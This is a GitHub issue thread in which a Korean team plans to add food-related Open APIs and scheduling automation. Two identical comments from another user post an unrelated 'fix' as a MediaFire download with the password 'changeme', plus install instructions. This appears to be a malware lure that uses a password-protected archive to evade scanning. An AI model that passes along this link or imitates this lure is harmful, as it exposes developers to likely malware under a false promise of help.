### ISSUE TITLE
[FEAT]B_OPENAPI_02 - API 추가 및 스케줄링 자동화

### ISSUE THREAD

**Issue by lielocks** [PreOnboarding-Team-11/YaMukJa#6]
## 📖 Describe
> 일식, 패스트푸드 관련 Open API 를 추가로 연결합니다
> 스케줄링 자동화 feature 를 설계합니다

## ✅ TODO
- [ ] Open API 추가
- [ ] 스케줄링

## 참고(선택)
> 참고자료

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
